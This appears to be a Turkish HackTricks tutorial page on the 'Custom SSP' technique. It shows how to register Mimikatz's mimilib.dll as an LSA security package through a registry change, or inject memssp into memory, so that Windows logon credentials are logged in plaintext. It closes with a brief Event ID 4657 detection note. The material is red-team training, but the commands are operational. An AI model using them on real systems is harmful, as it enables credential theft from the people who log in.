3.8 KiB
Custom SSP
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Custom SSP
SSP (Güvenlik Destek Sağlayıcısı) nedir burada öğrenin.
Kendi SSP'nizi oluşturabilirsiniz, böylece makineye erişmek için kullanılan kimlik bilgilerini düz metin olarak yakalayabilirsiniz.
Mimilib
Mimikatz tarafından sağlanan mimilib.dll
ikili dosyasını kullanabilirsiniz. Bu, tüm kimlik bilgilerini düz metin olarak bir dosyaya kaydedecektir.
Dll dosyasını C:\Windows\System32\
dizinine bırakın.
Mevcut LSA Güvenlik Paketlerinin bir listesini alın:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
mimilib.dll
dosyasını Güvenlik Destek Sağlayıcıları listesine (Güvenlik Paketleri) ekleyin:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
Ve bir yeniden başlatmadan sonra tüm kimlik bilgileri C:\Windows\System32\kiwissp.log
dosyasında düz metin olarak bulunabilir.
Bellekte
Bunu doğrudan belleğe Mimikatz kullanarak da enjekte edebilirsiniz (biraz kararsız/çalışmayabileceğini unutmayın):
privilege::debug
misc::memssp
Bu yeniden başlatmalara dayanmaz.
Hafifletme
Olay ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
oluşturma/değiştirme denetimi
{% hint style="success" %}
AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.